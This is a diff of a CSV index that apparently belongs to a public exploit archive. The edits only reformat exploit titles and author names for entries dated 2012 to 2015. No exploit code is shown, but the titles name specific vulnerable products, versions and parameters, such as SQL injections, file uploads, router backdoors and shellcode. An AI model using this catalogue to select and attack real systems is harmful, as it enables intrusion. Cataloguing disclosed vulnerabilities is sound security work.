Arbitrary File Upload",2012-06-07,"Sammy FORGIT",php,webapps,0 +37355,platforms/php/webapps/37355.txt,"MyBB 1.6.8 - 'member.php' SQL Injection",2012-06-06,MR.XpR,php,webapps,0 +37356,platforms/php/webapps/37356.txt,"WordPress Email Newsletter Plugin 8.0 - 'option' Parameter Information Disclosure",2012-06-07,"Sammy FORGIT",php,webapps,0 +37357,platforms/php/webapps/37357.php,"WordPress VideoWhisper Video Presentation Plugin 3.17 - 'vw_upload.php' Arbitrary File Upload",2012-06-07,"Sammy FORGIT",php,webapps,0 37337,platforms/php/webapps/37337.txt,"WHMCompleteSolution (WHMCS) 5.0 Multiple Application Function CSRF",2012-05-31,"Shadman Tanjim",php,webapps,0 37338,platforms/php/webapps/37338.txt,"WHMCompleteSolution (WHMCS) 5.0 knowledgebase.php search Parameter XSS",2012-05-31,"Shadman Tanjim",php,webapps,0 -37339,platforms/php/webapps/37339.txt,"VoipNow Professional 2.5.3 'nsextt' Parameter Cross Site Scripting",2012-06-01,Aboud-el,php,webapps,0 +37339,platforms/php/webapps/37339.txt,"VoipNow Professional 2.5.3 - 'nsextt' Parameter Cross Site Scripting",2012-06-01,Aboud-el,php,webapps,0 37340,platforms/php/webapps/37340.html,"TinyCMS 1.3 File Upload CSRF",2012-06-03,KedAns-Dz,php,webapps,0 37341,platforms/php/webapps/37341.txt,"TinyCMS 1.3 index.php page Parameter Traversal Local File Inclusion",2012-06-03,KedAns-Dz,php,webapps,0 37342,platforms/php/webapps/37342.txt,"TinyCMS 1.3 admin/admin.php do Parameter Traversal Local File Inclusion",2012-06-03,KedAns-Dz,php,webapps,0 @@ -33721,10 +33721,10 @@ id,file,description,date,author,platform,type,port 37364,platforms/php/webapps/37364.txt,"Joomla SimpleImageUpload - Arbitrary File Upload",2015-06-24,CrashBandicot,php,webapps,80 37365,platforms/lin_x86/shellcode/37365.c,"Linux/x86 - Download & Execute shellcode",2015-06-24,B3mB4m,lin_x86,shellcode,0 37366,platforms/lin_x86/shellcode/37366.c,"Linux/x86 - Reboot shellcode (28 bytes)",2015-06-24,B3mB4m,lin_x86,shellcode,0 -37367,platforms/windows/local/37367.rb,"Microsoft Windows - ClientCopyImage Win32k Exploit",2015-06-24,metasploit,windows,local,0 -37368,platforms/multiple/remote/37368.rb,"Adobe Flash Player ShaderJob Buffer Overflow",2015-06-24,metasploit,multiple,remote,0 +37367,platforms/windows/local/37367.rb,"Microsoft Windows - ClientCopyImage Win32k Exploit",2015-06-24,Metasploit,windows,local,0 +37368,platforms/multiple/remote/37368.rb,"Adobe Flash Player ShaderJob Buffer Overflow",2015-06-24,Metasploit,multiple,remote,0 37369,platforms/php/webapps/37369.txt,"Vesta Control Panel 0.9.8 - OS Command Injection",2015-06-24,"High-Tech Bridge SA",php,webapps,0 -37370,platforms/php/webapps/37370.php,"WordPress FCChat Widget Plugin 2.2.x 'Upload.php' Arbitrary File Upload",2012-06-07,"Sammy FORGIT",php,webapps,0 +37370,platforms/php/webapps/37370.php,"WordPress FCChat Widget Plugin 2.2.x - 'Upload.php' Arbitrary File Upload",2012-06-07,"Sammy FORGIT",php,webapps,0 37371,platforms/php/webapps/37371.php,"WordPress Picturesurf Gallery Plugin 'upload.php' Arbitrary File Upload",2012-06-03,"Sammy FORGIT",php,webapps,0 37372,platforms/java/webapps/37372.html,"BMC Identity Management Cross Site Request Forgery",2012-06-11,"Travis Lee",java,webapps,0 37373,platforms/php/webapps/37373.php,"WordPress Contus Video Gallery Plugin 'upload1.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0 @@ -33757,9 +33757,9 @@ id,file,description,date,author,platform,type,port 37401,platforms/lin_x86-64/shellcode/37401.asm,"Linux/x86-64 - Encoded execve shellcode (57 bytes)",2015-06-27,"Bill Borskey",lin_x86-64,shellcode,0 37429,platforms/hardware/remote/37429.txt,"Juniper Networks Mobility System Software 'aaa/wba_login.html' Cross Site Scripting",2012-06-14,"Craig Lambert",hardware,remote,0 37403,platforms/php/webapps/37403.php,"WordPress Invit0r Plugin 'ofc_upload_image.php' Arbitrary File Upload",2012-06-14,"Sammy FORGIT",php,webapps,0 -37404,platforms/php/webapps/37404.txt,"MediaWiki 1.x 'uselang' Parameter Cross Site Scripting",2012-06-17,anonymous,php,webapps,0 +37404,platforms/php/webapps/37404.txt,"MediaWiki 1.x - 'uselang' Parameter Cross Site Scripting",2012-06-17,anonymous,php,webapps,0 37405,platforms/hardware/remote/37405.py,"Edimax IC-3030iWn UDP Packet Password Information Disclosure",2012-06-14,y3dips,hardware,remote,0 -37406,platforms/php/webapps/37406.php,"WordPress Zingiri Web Shop Plugin 2.4.3 'uploadfilexd.php' Arbitrary File Upload",2012-06-14,"Sammy FORGIT",php,webapps,0 +37406,platforms/php/webapps/37406.php,"WordPress Zingiri Web Shop Plugin 2.4.3 - 'uploadfilexd.php' Arbitrary File Upload",2012-06-14,"Sammy FORGIT",php,webapps,0 37407,platforms/php/webapps/37407.txt,"ADICO 'index.php' Script SQL Injection",2012-06-15,"Ibrahim El-Sayed",php,webapps,0 37408,platforms/php/webapps/37408.txt,"Simple Forum PHP Multiple SQL Injection Vulnerabilities",2012-06-14,"Vulnerability Research Laboratory",php,webapps,0 37409,platforms/php/webapps/37409.txt,"NetArt Media Jobs Portal SQL Injection Vulnerabilities",2012-06-14,"Ibrahim El-Sayed",php,webapps,0 @@ -33786,7 +33786,7 @@ id,file,description,date,author,platform,type,port 37430,platforms/php/webapps/37430.txt,"CMS Balitbang Multiple HTML Injection and Cross Site Scripting Vulnerabilities",2012-06-19,TheCyberNuxbie,php,webapps,0 37431,platforms/php/webapps/37431.php,"e107 Hupsi_fancybox Plugin 'uploadify.php' Arbitrary File Upload",2012-06-19,"Sammy FORGIT",php,webapps,0 37432,platforms/php/webapps/37432.txt,"e107 Image Gallery Plugin 'name' Parameter Remote File Disclosure",2012-06-19,"Sammy FORGIT",php,webapps,0 -37433,platforms/php/webapps/37433.txt,"AdaptCMS 2.0.2 'index.php' Script Cross Site Scripting",2012-06-19,indoushka,php,webapps,0 +37433,platforms/php/webapps/37433.txt,"AdaptCMS 2.0.2 - 'index.php' Script Cross Site Scripting",2012-06-19,indoushka,php,webapps,0 37434,platforms/php/webapps/37434.txt,"e107 FileDownload Plugin Arbitrary File Upload and Remote File Disclosure Vulnerabilities",2012-06-19,"Sammy FORGIT",php,webapps,0 37435,platforms/php/webapps/37435.txt,"web@all Cross Site Scripting",2012-06-20,"High-Tech Bridge",php,webapps,0 37436,platforms/php/webapps/37436.txt,"Commentics 'index.php' Cross Site Scripting",2012-06-20,"Jean Pascal Pereira",php,webapps,0 @@ -33801,7 +33801,7 @@ id,file,description,date,author,platform,type,port 37445,platforms/php/webapps/37445.txt,"CMS Lokomedia Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2012-06-22,the_cyber_nuxbie,php,webapps,0 37446,platforms/php/webapps/37446.txt,"Fiyo CMS 2.0_1.9.1 - SQL Injection",2015-06-30,cfreer,php,webapps,80 37447,platforms/asp/webapps/37447.txt,"C2Box 4.0.0(r19171) - CSRF",2015-06-30,"Wissam Bashour",asp,webapps,0 -37448,platforms/multiple/remote/37448.rb,"Adobe Flash Player Drawing Fill Shader Memory Corruption",2015-06-30,metasploit,multiple,remote,0 +37448,platforms/multiple/remote/37448.rb,"Adobe Flash Player Drawing Fill Shader Memory Corruption",2015-06-30,Metasploit,multiple,remote,0 37449,platforms/hardware/webapps/37449.txt,"Polycom RealPresence Resource Manager < 8.4 - Multiple Vulnerabilities",2015-06-30,"SEC Consult",hardware,webapps,0 37450,platforms/php/webapps/37450.txt,"Amazon S3 Uploadify Script 'uploadify.php' Arbitrary File Upload",2012-06-23,"Sammy FORGIT",php,webapps,0 37451,platforms/php/webapps/37451.txt,"SilverStripe Pixlr Image Editor 'upload.php' Arbitrary File Upload",2012-06-23,"Sammy FORGIT",php,webapps,0 @@ -33809,13 +33809,13 @@ id,file,description,date,author,platform,type,port 37453,platforms/php/webapps/37453.php,"Drupal Drag & Drop Gallery 'upload.php' Arbitrary File Upload",2012-06-25,"Sammy FORGIT",php,webapps,0 37454,platforms/hardware/webapps/37454.txt,"D-Link DSP-W w110 v1.05b01 - Multiple Vulnerabilities",2015-07-01,DNO,hardware,webapps,0 37499,platforms/php/webapps/37499.txt,"Phonalisa Multiple HTML-Injection Cross-Site Scripting",2012-07-12,"Benjamin Kunz Mejri",php,webapps,0 -37456,platforms/windows/dos/37456.html,"McAfee SiteAdvisor 3.7.2 (firefox) Use After Free PoC",2015-07-01,"Marcin Ressel",windows,dos,0 +37456,platforms/windows/dos/37456.html,"McAfee SiteAdvisor 3.7.2 - (firefox) Use After Free PoC",2015-07-01,"Marcin Ressel",windows,dos,0 37457,platforms/php/webapps/37457.html,"FCKEditor Core - (Editor 'spellchecker.php') Cross Site Scripting",2012-06-25,"Emilio Pinna",php,webapps,0 -37458,platforms/windows/dos/37458.pl,"Winamp 5.13 '.m3u' File Exception Handling Remote Denial of Service",2012-06-25,Dark-Puzzle,windows,dos,0 +37458,platforms/windows/dos/37458.pl,"Winamp 5.13 - '.m3u' File Exception Handling Remote Denial of Service",2012-06-25,Dark-Puzzle,windows,dos,0 37459,platforms/php/webapps/37459.txt,"Umapresence Local File Include and Arbitrary File Deletion Vulnerabilities",2012-06-25,"Sammy FORGIT",php,webapps,0 37460,platforms/php/webapps/37460.txt,"Schoolhos CMS HTML Injection Vulnerabilities",2012-06-27,the_cyber_nuxbie,php,webapps,0 37461,platforms/php/webapps/37461.txt,"DigPHP 'dig.php' Script Remote File Disclosure",2012-06-26,"Ryuzaki Lawlet",php,webapps,0 -37462,platforms/windows/dos/37462.pl,"VLC Media Player 2.0.1 '.avi' File Denial of Service",2012-06-28,Dark-Puzzle,windows,dos,0 +37462,platforms/windows/dos/37462.pl,"VLC Media Player 2.0.1 - '.avi' File Denial of Service",2012-06-28,Dark-Puzzle,windows,dos,0 37463,platforms/windows/dos/37463.pl,"Real Networks RealPlayer '.avi' File Divide-By-Zero Denial of Service",2012-06-28,Dark-Puzzle,windows,dos,0 37464,platforms/php/webapps/37464.txt,"WordPress Albo Pretorio Online 3.2 - Multiple Vulnerabilities",2015-07-02,"Alessandro Cingolani",php,webapps,80 37466,platforms/php/webapps/37466.php,"PHP-Fusion Advanced MP3 Player Infusion 'upload.php' Arbitrary File Upload",2012-06-28,"Sammy FORGIT",php,webapps,0 @@ -33858,7 +33858,7 @@ id,file,description,date,author,platform,type,port 37506,platforms/php/webapps/37506.php,"WordPress Post Recommendations Plugin 'abspath' Parameter Remote File Include",2012-07-16,"Sammy FORGIT",php,webapps,0 37507,platforms/php/webapps/37507.txt,"web@all 'name' Parameter Cross Site Scripting",2012-07-16,"Sammy FORGIT",php,webapps,0 37508,platforms/php/webapps/37508.txt,"Rama Zeiten CMS 'download.php' Remote File Disclosure",2012-07-16,"Sammy FORGIT",php,webapps,0 -37509,platforms/php/webapps/37509.txt,"EmbryoCore CMS 1.03 'loadcss.php' Multiple Directory Traversal Vulnerabilities",2012-07-16,"Sammy FORGIT",php,webapps,0 +37509,platforms/php/webapps/37509.txt,"EmbryoCore CMS 1.03 - 'loadcss.php' Multiple Directory Traversal Vulnerabilities",2012-07-16,"Sammy FORGIT",php,webapps,0 37510,platforms/windows/remote/37510.c,"Google Chrome 19.0.1084.52 - 'metro_driver.dll' DLL Loading Arbitrary Code Execution",2012-06-26,"Moshe Zioni",windows,remote,0 37511,platforms/php/webapps/37511.txt,"AVA VoIP Multiple Security Vulnerabilities",2012-07-17,"Ibrahim El-Sayed",php,webapps,0 37512,platforms/hardware/remote/37512.txt,"Barracuda SSL VPN launchAgent.do return-To Parameter XSS",2012-07-18,"Benjamin Kunz Mejri",hardware,remote,0 @@ -33870,9 +33870,9 @@ id,file,description,date,author,platform,type,port 37518,platforms/multiple/dos/37518.html,"Arora Browser Remote Denial of Service",2012-07-18,t3rm!n4t0r,multiple,dos,0 37519,platforms/php/webapps/37519.txt,"Joomla! 'com_hello' Component 'controller' Parameter Local File Include",2012-07-19,"AJAX Security Team",php,webapps,0 37520,platforms/php/webapps/37520.txt,"Maian Survey 'index.php' URI Redirection and Local File Include Vulnerabilities",2012-07-20,PuN!Sh3r,php,webapps,0 -37521,platforms/php/webapps/37521.txt,"CodeIgniter <= 2.1 'xss_clean()' Filter Security Bypass",2012-07-19,"Krzysztof Kotowicz",php,webapps,0 +37521,platforms/php/webapps/37521.txt,"CodeIgniter <= 2.1 - 'xss_clean()' Filter Security Bypass",2012-07-19,"Krzysztof Kotowicz",php,webapps,0 37522,platforms/php/webapps/37522.txt,"WordPress chenpress Plugin Arbitrary File Upload",2012-07-21,Am!r,php,webapps,0 -37523,platforms/multiple/remote/37523.rb,"Adobe Flash Player ByteArray Use After Free",2015-07-08,metasploit,multiple,remote,0 +37523,platforms/multiple/remote/37523.rb,"Adobe Flash Player ByteArray Use After Free",2015-07-08,Metasploit,multiple,remote,0 37524,platforms/hardware/webapps/37524.txt,"Cradlepoint MBR1400 and MBR1200 Local File Inclusion",2015-07-08,Doc_Hak,hardware,webapps,80 37525,platforms/windows/dos/37525.c,"Symantec Endpoint Protection 12.1.4013 Service Disabling",2015-07-08,hyp3rlinx,windows,dos,0 37526,platforms/windows/dos/37526.txt,"Immunity Debugger 1.85 - Crash PoC",2015-07-08,Arsyntex,windows,dos,0 @@ -33883,7 +33883,7 @@ id,file,description,date,author,platform,type,port 37531,platforms/hardware/webapps/37531.txt,"Grandstream GXV3275 < 1.0.3.30 - Multiple Vulnerabilities",2015-07-08,"David Jorm",hardware,webapps,0 37532,platforms/hardware/webapps/37532.txt,"AirLive Multiple Products OS Command Injection",2015-07-08,"Core Security",hardware,webapps,8080 37533,platforms/asp/webapps/37533.txt,"Orchard CMS 1.7.3/1.8.2/1.9.0 - Stored XSS",2015-07-08,"Paris Zoumpouloglou",asp,webapps,80 -37536,platforms/multiple/remote/37536.rb,"Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow",2015-07-08,metasploit,multiple,remote,0 +37536,platforms/multiple/remote/37536.rb,"Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow",2015-07-08,Metasploit,multiple,remote,0 37537,platforms/php/webapps/37537.txt,"phpProfiles Multiple Security Vulnerabilities",2012-07-24,L0n3ly-H34rT,php,webapps,0 37538,platforms/linux/dos/37538.py,"ISC DHCP 4.x Multiple Denial of Service Vulnerabilities",2012-07-25,"Markus Hietava",linux,dos,0 37539,platforms/php/webapps/37539.txt,"REDAXO 'subpage' Parameter Cross Site Scripting",2012-07-25,"High-Tech Bridge SA",php,webapps,0 @@ -33891,7 +33891,7 @@ id,file,description,date,author,platform,type,port 37541,platforms/php/webapps/37541.txt,"tekno.Portal 0.1b 'anket.php' SQL Injection",2012-07-25,Socket_0x03,php,webapps,0 37542,platforms/windows/remote/37542.html,"BarCodeWiz 'BarcodeWiz.dll' ActiveX Control 'Barcode' Method Remote Buffer Overflow",2012-07-25,coolkaveh,windows,remote,0 37543,platforms/linux/local/37543.c,"Linux Kernel 2.6.x - 'rds_recvmsg()' Function Local Information Disclosure",2012-07-26,"Jay Fenlason",linux,local,0 -37544,platforms/php/webapps/37544.txt,"ocPortal 7.1.5 'redirect' Parameter URI Redirection",2012-07-29,"Aung Khant",php,webapps,0 +37544,platforms/php/webapps/37544.txt,"ocPortal 7.1.5 - 'redirect' Parameter URI Redirection",2012-07-29,"Aung Khant",php,webapps,0 37547,platforms/php/webapps/37547.txt,"Scrutinizer 9.0.1.19899 Multiple Cross Site Scripting Vulnerabilities",2012-07-30,"Mario Ceballos",php,webapps,0 37548,platforms/php/webapps/37548.txt,"Scrutinizer 9.0.1.19899 Arbitrary File Upload",2012-07-30,"Mario Ceballos",php,webapps,0 37549,platforms/cgi/webapps/37549.txt,"Scrutinizer 9.0.1.19899 HTTP Authentication Bypass",2012-07-30,"Mario Ceballos",cgi,webapps,0 @@ -33921,25 +33921,25 @@ id,file,description,date,author,platform,type,port 37579,platforms/php/webapps/37579.txt,"Open Constructor data/file/edit.php result Parameter XSS",2012-08-04,"Lorenzo Cantoni",php,webapps,0 37580,platforms/php/webapps/37580.txt,"Open Constructor confirm.php q Parameter XSS",2012-08-04,"Lorenzo Cantoni",php,webapps,0 37581,platforms/php/webapps/37581.txt,"Dir2web system/src/dispatcher.php oid Parameter SQL Injection",2012-08-07,"Daniel Correa",php,webapps,0 -37582,platforms/php/webapps/37582.py,"Mibew Messenger 1.6.4 'threadid' Parameter SQL Injection",2012-08-05,"Ucha Gobejishvili",php,webapps,0 +37582,platforms/php/webapps/37582.py,"Mibew Messenger 1.6.4 - 'threadid' Parameter SQL Injection",2012-08-05,"Ucha Gobejishvili",php,webapps,0 37583,platforms/php/webapps/37583.txt,"YT-Videos Script 'id' Parameter SQL Injection",2012-08-06,3spi0n,php,webapps,0 -37584,platforms/php/webapps/37584.txt,"TCExam 11.2.x /admin/code/tce_edit_answer.php Multiple Parameter SQL Injection",2012-08-07,"Chris Cooper",php,webapps,0 -37585,platforms/php/webapps/37585.txt,"TCExam 11.2.x /admin/code/tce_edit_question.php subject_module_id Parameter SQL Injection",2012-08-07,"Chris Cooper",php,webapps,0 +37584,platforms/php/webapps/37584.txt,"TCExam 11.2.x - /admin/code/tce_edit_answer.php Multiple Parameter SQL Injection",2012-08-07,"Chris Cooper",php,webapps,0 +37585,platforms/php/webapps/37585.txt,"TCExam 11.2.x - /admin/code/tce_edit_question.php subject_module_id Parameter SQL Injection",2012-08-07,"Chris Cooper",php,webapps,0 37586,platforms/php/webapps/37586.php,"PBBoard Authentication Bypass",2012-08-07,i-Hmx,php,webapps,0 37587,platforms/php/webapps/37587.txt,"GetSimple 'path' Parameter Local File Include",2012-08-07,PuN!Sh3r,php,webapps,0 37588,platforms/php/webapps/37588.txt,"phpSQLiteCMS - Multiple Vulnerabilities",2015-07-13,hyp3rlinx,php,webapps,80 37589,platforms/java/webapps/37589.txt,"ConcourseSuite Multiple Cross Site Scripting and Cross Site Request Forgery Vulnerabilities",2012-08-08,"Matthew Joyce",java,webapps,0 -37590,platforms/php/webapps/37590.txt,"PHPList 2.10.18 'unconfirmed' Parameter Cross-Site Scripting",2012-08-08,"High-Tech Bridge SA",php,webapps,0 +37590,platforms/php/webapps/37590.txt,"PHPList 2.10.18 - 'unconfirmed' Parameter Cross-Site Scripting",2012-08-08,"High-Tech Bridge SA",php,webapps,0 37591,platforms/php/webapps/37591.php,"AraDown 'id' Parameter SQL Injection",2012-08-08,G-B,php,webapps,0 37592,platforms/php/webapps/37592.php,"FreiChat 9.6 - SQL Injection",2015-07-13,"Kacper Szurek",php,webapps,80 37593,platforms/windows/dos/37593.py,"Full Player 8.2.1 - Memory Corruption PoC",2015-07-13,"SATHISH ARTHAR",windows,dos,0 37594,platforms/php/webapps/37594.txt,"Arab Portal 3 - SQL Injection",2015-07-13,"ali ahmady",php,webapps,80 37595,platforms/php/webapps/37595.txt,"phpVibe - Aribtrary File Disclosure",2015-07-13,"ali ahmady",php,webapps,80 37596,platforms/php/webapps/37596.txt,"ArticleFR 3.0.6 - Multiple Vulnerabilities",2015-07-13,LiquidWorm,php,webapps,80 -37597,platforms/hardware/remote/37597.rb,"Accellion FTA getStatus verify_oauth_token Command Execution",2015-07-13,metasploit,hardware,remote,443 -37598,platforms/multiple/remote/37598.rb,"VNC Keyboard Remote Code Execution",2015-07-13,metasploit,multiple,remote,5900 -37599,platforms/windows/remote/37599.rb,"Adobe Flash opaqueBackground Use After Free",2015-07-13,metasploit,windows,remote,0 -37600,platforms/multiple/remote/37600.rb,"Western Digital Arkeia Remote Code Execution",2015-07-13,metasploit,multiple,remote,617 +37597,platforms/hardware/remote/37597.rb,"Accellion FTA getStatus verify_oauth_token Command Execution",2015-07-13,Metasploit,hardware,remote,443 +37598,platforms/multiple/remote/37598.rb,"VNC Keyboard Remote Code Execution",2015-07-13,Metasploit,multiple,remote,5900 +37599,platforms/windows/remote/37599.rb,"Adobe Flash opaqueBackground Use After Free",2015-07-13,Metasploit,windows,remote,0 +37600,platforms/multiple/remote/37600.rb,"Western Digital Arkeia Remote Code Execution",2015-07-13,Metasploit,multiple,remote,617 37601,platforms/php/webapps/37601.txt,"WordPress Swim Team Plugin 1.44.10777 - Arbitrary File Download",2015-07-13,"Larry W. Cashdollar",php,webapps,80 37602,platforms/php/webapps/37602.txt,"ZenPhoto 1.4.8 - Multiple Vulnerabilities",2015-07-13,"Tim Coen",php,webapps,80 37603,platforms/php/webapps/37603.txt,"WordPress CP Contact Form with Paypal Plugin 1.1.5 - Multiple Vulnerabilities",2015-07-13,"Nitin Venkatesh",php,webapps,80 @@ -33951,7 +33951,7 @@ id,file,description,date,author,platform,type,port 37610,platforms/php/webapps/37610.txt,"sysPass 1.0.9 - SQL Injection",2015-07-14,"SySS GmbH",php,webapps,0 37611,platforms/windows/remote/37611.php,"Impero Education Pro - SYSTEM Remote Command Execution",2015-07-14,slipstream,windows,remote,0 37612,platforms/windows/dos/37612.py,"ZOC Terminal Emulator 7 - (Quick Connection) Crash PoC",2015-07-14,"SATHISH ARTHAR",windows,dos,0 -37613,platforms/php/webapps/37613.txt,"PHPList 2.10.18 'index.php' SQL Injection",2012-08-08,"High-Tech Bridge SA",php,webapps,0 +37613,platforms/php/webapps/37613.txt,"PHPList 2.10.18 - 'index.php' SQL Injection",2012-08-08,"High-Tech Bridge SA",php,webapps,0 37614,platforms/php/webapps/37614.txt,"PBBoard index.php Multiple Parameter SQL Injection",2012-08-08,"High-Tech Bridge",php,webapps,0 37615,platforms/php/webapps/37615.txt,"PBBoard member_id Parameter Validation Password Manipulation",2012-08-08,"High-Tech Bridge",php,webapps,0 37616,platforms/php/webapps/37616.txt,"PBBoard admin.php xml_name Parameter Arbitrary PHP Code Execution",2012-08-08,"High-Tech Bridge",php,webapps,0 @@ -33962,7 +33962,7 @@ id,file,description,date,author,platform,type,port 37624,platforms/hardware/webapps/37624.txt,"4 TOTOLINK Router Models - CSRF and XSS Vulnerabilities",2015-07-16,"Pierre Kim",hardware,webapps,0 37625,platforms/hardware/webapps/37625.txt,"4 TOTOLINK Router Models - Backdoor Credentials",2015-07-16,"Pierre Kim",hardware,webapps,0 37626,platforms/hardware/webapps/37626.txt,"8 TOTOLINK Router Models - Backdoor and RCE",2015-07-16,"Pierre Kim",hardware,webapps,0 -37628,platforms/hardware/remote/37628.rb,"D-Link Cookie Command Execution",2015-07-17,metasploit,hardware,remote,0 +37628,platforms/hardware/remote/37628.rb,"D-Link Cookie Command Execution",2015-07-17,Metasploit,hardware,remote,0 37629,platforms/php/webapps/37629.txt,"WordPress BuddyPress Activity Plus Plugin 1.5 - CSRF",2015-07-17,"Tom Adams",php,webapps,80 37630,platforms/php/webapps/37630.txt,"Hotel Booking Portal 0.1 Multiple SQL Injection and Cross Site Scripting Vulnerabilities",2012-08-09,"Yakir Wizman",php,webapps,0 37631,platforms/linux/local/37631.c,"GNU glibc Multiple Local Stack Buffer Overflow Vulnerabilities",2012-08-13,"Joseph S. Myer",linux,local,0 @@ -33984,12 +33984,12 @@ id,file,description,date,author,platform,type,port 37647,platforms/multiple/remote/37647.txt,"Apache Struts2 Skill Name Remote Code Execution",2012-08-23,kxlzx,multiple,remote,0 37648,platforms/php/webapps/37648.txt,"Joomla! CiviCRM Component Multiple Arbitrary File Upload Vulnerabilities",2012-08-22,Crim3R,php,webapps,0 37649,platforms/php/webapps/37649.html,"SiNG cms 'password.php' Cross Site Scripting",2012-08-23,LiquidWorm,php,webapps,0 -37650,platforms/php/webapps/37650.txt,"1024 CMS 2.1.1 'p' Parameter SQL Injection",2012-08-22,kallimero,php,webapps,0 +37650,platforms/php/webapps/37650.txt,"1024 CMS 2.1.1 - 'p' Parameter SQL Injection",2012-08-22,kallimero,php,webapps,0 37651,platforms/php/webapps/37651.html,"Monstra Multiple HTML Injection Vulnerabilities",2012-08-23,LiquidWorm,php,webapps,0 37652,platforms/php/webapps/37652.txt,"KindEditor 'name' Parameter Cross Site Scripting",2012-08-23,LiquidWorm,php,webapps,0 37653,platforms/php/webapps/37653.txt,"WordPress Rich Widget Plugin Arbitrary File Upload",2012-08-22,Crim3R,php,webapps,0 37654,platforms/php/webapps/37654.txt,"WordPress Monsters Editor for WP Super Edit Plugin Arbitrary File Upload",2012-08-22,Crim3R,php,webapps,0 -37655,platforms/windows/remote/37655.c,"Adobe Pixel Bender Toolkit2 'tbbmalloc.dll' Multiple DLL Loading Code Execution Vulnerabilities",2012-08-23,coolkaveh,windows,remote,0 +37655,platforms/windows/remote/37655.c,"Adobe Pixel Bender Toolkit2 - 'tbbmalloc.dll' Multiple DLL Loading Code Execution Vulnerabilities",2012-08-23,coolkaveh,windows,remote,0 37656,platforms/php/webapps/37656.txt,"PHP Web Scripts Ad Manager Pro 'page' Parameter Local File Include",2012-08-23,"Corrado Liotta",php,webapps,0 37657,platforms/windows/local/37657.txt,"Microsoft Word Local Machine Zone Remote Code Execution",2015-07-20,"Eduardo Braun Prado",windows,local,0 37688,platforms/php/remote/37688.txt,"PHP 'header()' HTTP Header Injection",2011-10-06,"Mr. Tokumaru",php,remote,0 @@ -33998,7 +33998,7 @@ id,file,description,date,author,platform,type,port 37662,platforms/multiple/webapps/37662.txt,"Airdroid iOS_ Android & Win 3.1.3 - Persistent",2015-07-20,Vulnerability-Lab,multiple,webapps,0 37663,platforms/linux/dos/37663.txt,"TcpDump rpki_rtr_pdu_print Out-of-Bounds Denial of Service",2015-07-20,"Luke Arntson",linux,dos,0 37666,platforms/php/webapps/37666.txt,"Joomla! Helpdesk Pro Plugin < 1.4.0 - Multiple Vulnerabilities",2015-07-21,"Simon Rawet",php,webapps,80 -37667,platforms/java/remote/37667.rb,"SysAid Help Desk 'rdslogs' Arbitrary File Upload",2015-07-21,metasploit,java,remote,0 +37667,platforms/java/remote/37667.rb,"SysAid Help Desk 'rdslogs' Arbitrary File Upload",2015-07-21,Metasploit,java,remote,0 37668,platforms/windows/remote/37668.php,"Internet Download Manager - OLE Automation Array Remote Code Execution",2015-07-21,"Mohammad Reza Espargham",windows,remote,0 37669,platforms/windows/dos/37669.pl,"Counter-Strike 1.6 - 'GameInfo' Query Reflection DoS PoC",2015-07-22,"Todor Donev",windows,dos,0 37670,platforms/osx/local/37670.sh,"OS X 10.10 - DYLD_PRINT_TO_FILE Local Privilege Escalation",2015-07-22,"Stefan Esser",osx,local,0 @@ -34027,12 +34027,12 @@ id,file,description,date,author,platform,type,port 37694,platforms/php/webapps/37694.txt,"Wiki Web Help 'configpath' Parameter Remote File Include",2012-08-04,L0n3ly-H34rT,php,webapps,0 37695,platforms/php/webapps/37695.txt,"Sciretech Multiple Products Multiple SQL Injection Vulnerabilities",2012-09-04,AkaStep,php,webapps,0 37696,platforms/asp/webapps/37696.txt,"Cm3 CMS 'search.asp' Multiple Cross-Site Scripting Vulnerabilities",2012-09-05,Crim3R,asp,webapps,0 -37697,platforms/php/webapps/37697.txt,"phpFox 3.0.1 'ajax.php' Multiple Cross Site Scripting Vulnerabilities",2012-09-04,Crim3R,php,webapps,0 +37697,platforms/php/webapps/37697.txt,"phpFox 3.0.1 - 'ajax.php' Multiple Cross Site Scripting Vulnerabilities",2012-09-04,Crim3R,php,webapps,0 37698,platforms/php/webapps/37698.txt,"Kayako Fusion 'download.php' Cross Site Scripting",2012-09-05,"High-Tech Bridge",php,webapps,0 37699,platforms/windows/local/37699.py,"Foxit Reader - PNG Conversion Parsing tEXt Chunk Arbitrary Code Execution",2015-07-27,"Sascha Schirra",windows,local,0 37700,platforms/multiple/webapps/37700.txt,"Hawkeye-G 3.0.1.4912 - Persistent XSS & Information Leakage",2015-07-27,hyp3rlinx,multiple,webapps,0 37706,platforms/linux/dos/37706.txt,"Libuser Library - Multiple Vulnerabilities",2015-07-27,"Qualys Corporation",linux,dos,0 -37737,platforms/windows/local/37737.rb,"Heroes of Might and Magic III .h3m Map file Buffer Overflow",2015-08-07,metasploit,windows,local,0 +37737,platforms/windows/local/37737.rb,"Heroes of Might and Magic III .h3m Map file Buffer Overflow",2015-08-07,Metasploit,windows,local,0 37825,platforms/osx/local/37825.txt,"OS X 10.10.5 - XNU Local Privilege Escalation",2015-08-18,kpwn,osx,local,0 37826,platforms/php/webapps/37826.txt,"WordPress Multiple Path Dislosure Vulnerabilities",2012-09-18,AkaStep,php,webapps,0 37751,platforms/php/webapps/37751.txt,"WordPress WPTF Image Gallery 1.03 - Aribtrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80 @@ -34054,7 +34054,7 @@ id,file,description,date,author,platform,type,port 37720,platforms/hardware/webapps/37720.py,"NETGEAR ReadyNAS LAN /dbbroker 6.2.4 - Credential Disclosure",2015-07-31,St0rn,hardware,webapps,0 37721,platforms/multiple/dos/37721.c,"BIND9 - TKEY PoC",2015-08-01,"Errata Security",multiple,dos,0 37722,platforms/linux/local/37722.c,"Linux espfix64 - Privilege Escalation (Nested NMIs Interrupting)",2015-08-05,"Andrew Lutomirski",linux,local,0 -37723,platforms/multiple/dos/37723.py,"ISC BIND9 TKEY Remote DoS PoC",2015-08-05,elceef,multiple,dos,0 +37723,platforms/multiple/dos/37723.py,"ISC BIND9 - TKEY Remote DoS PoC",2015-08-05,elceef,multiple,dos,0 37724,platforms/linux/local/37724.asm,"Linux x86 - Memory Sinkhole Privilege Escalation PoC",2015-08-07,"Christopher Domas",linux,local,0 37725,platforms/php/webapps/37725.txt,"Froxlor Server Management Panel 0.9.33.1 - MySQL Login Information Disclosure",2015-08-07,"Dustin Dörr",php,webapps,0 37726,platforms/php/webapps/37726.txt,"PHP News Script 4.0.0 - SQL Injection",2015-08-07,"Meisam Monsef",php,webapps,80 @@ 